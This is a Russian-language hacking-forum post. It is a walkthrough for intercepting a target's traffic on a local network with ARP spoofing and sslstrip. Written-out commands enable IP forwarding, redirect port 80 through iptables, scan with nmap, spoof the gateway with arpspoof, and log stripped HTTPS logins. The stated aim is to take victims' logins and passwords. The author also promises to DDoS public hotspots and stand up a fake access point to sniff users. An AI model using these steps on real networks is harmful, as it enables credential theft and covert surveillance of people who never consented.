SSL Strip, MITM и немного удачи

• Гость, группы пользователей ещё в процессе настройки, поэтому многие функции пока что недоступны. Приносим свои извинения за возможные неудобства.

FvckT0R

Модератор
Команда форума
3 Апр 2019
18
32
10
Слышали же наверно о MITM атаках.Кстати я приводил пример атаки в этой статье(тык). Man in the middle дает нам возможность слушать трафик нашей цели. А для этого надо всего лишь встать в сети между роутером и компьютером нашей цели. Это обычно делается после того, как мы взломали Wifi или влезли в локальную сеть. Благо мануалов по взлому wifi сейчас больше, чем разумных людей на планете. Из под Linux, из под Windows, ломайте, как хотите. Я довольно долго думал писать вам про wifi или нет, но это настолько замыленная тема, что решил отказаться. Я вам лучше в будущем продемонстрирую как работает фэйк точка в общественном месте, например в ресторанном дворике, где куча точек из Макдака, БургерКинга и т.п. Заддосим их точку, откроем свою, и прослушаем весь трафик пользователей. Это будет интереснее

Вернемся к SSLStrip. Раньше было проще, когда весь интернет был на обычном http, все POST запросы были в открытом виде и добыть лог пас жертвы не составляло большого труда. Сейчас же придумали эти сертификаты.SSL, TLS и весь трафик шифруется... https некогда был большой проблемой. Но все решается и был придуман sslstrip, который и поможет нам в решении наших задач. Решить конечно мы сможем не все, есть некоторые ограничения. Потому как киты интернета грамотно строят защиту своих сайтов, а также модные браузеры ограничивают некоторые возможности, и sslstrip в таких случаях не всегда нам поможет

Итак приступим. Я буду использовать Kali, Вы как хотите. Первоначальная настройка нашей системы:

• Есть такой файлик /proc/sys/net/ipv4/ip_forward, там по умолчанию стоит значение 0. Если обратиться к документам Debian, то там скажут что этот параметр запрещает/разрешает передачу пакетов между интерфейсами. Грубо говоря, нам надо включить этот параметр, чтобы мы стали роутером и пересылали пакеты, как нам это надо. Прописываем:
    Код:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    IMG_20190604_020324_109.jpgОтлично. При такой записи,
    ip_forward будет работать у нас до перезагрузки. Если хотим изменить этот параметр навечно, то идем /etc/sysctl.conf и снимаем комментарий #net.ipv4.ip_forward=1IMG_20190604_020728_745.jpg
  • Перейдем к настройке Iptables. Прописываем:
    Код:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  1. Код:
    -t nat
    - тут мы создаем имя таблицы, в нашем случае nat
  2. Код:
    -A
    -добавляем новое правило в цепочку PREROUTING
  3. Код:
    -p tcp--destination-port 80
    -указываем порт назначения, ставим 80
  4. Код:
    -j
    - так мы описываем переход в другую цепочку REDIRECT
  5. Код:
    --to-port 8080
    - тут все понятно, указываем на какой порт перенаправляем
IMG_20190604_021435_304.jpg
Теперь надо узнать шлюз по умолчанию и адрес нашей цели. Это легкий этап, и скорее всего и так знают адрес шлюза, но на всякий случай напишу. Вводим
Код:
route -n.
IMG_20190604_021627_132.jpg
Теперь сканируем сеть, чтобы узнать адрес цели. Можно использовать любой сканер. В качестве примера, я буду использовать nmap. Вводим:
Код:
nmap -sS -O 172.20.10.1/25
Подготовительный этап завершен. Теперь перейдем непосредственно к прослушиванию трафика
Вводим команду:
Код:
arpspoof -i eth0 -t 172.20.10.7 172.20.10.1
и нажимаем Enter. Окно не закрываем, не останавливаем процесс
  1. -i eth0 - имя интерфейса
  2. -t 172.20.10.7 - это таргет, наша цель, адрес у вас будет другой
  3. 172.20.10.1 - это адрес шлюза
Должно получиться так:IMG_20190604_021627_132.jpg
Открываем новый терминал и пишем
Код:
sslstrip -l 8080
Нажимаем Enter и ждем пока цель будет пользоваться интернетом. Для удобства наблюдения можно в новом терминале набрать команду tail
Код:
-f sslstrip.log
IMG_20190604_022115_154.jpg
Я скачал все последние версии популярных браузеров и хочу сказать, что самый защищенный это Google Chrome(ПК версия) или Firefox. Обычным sslstrip его не поломать никак

• Лайк
Реакции: ProTon и Wolf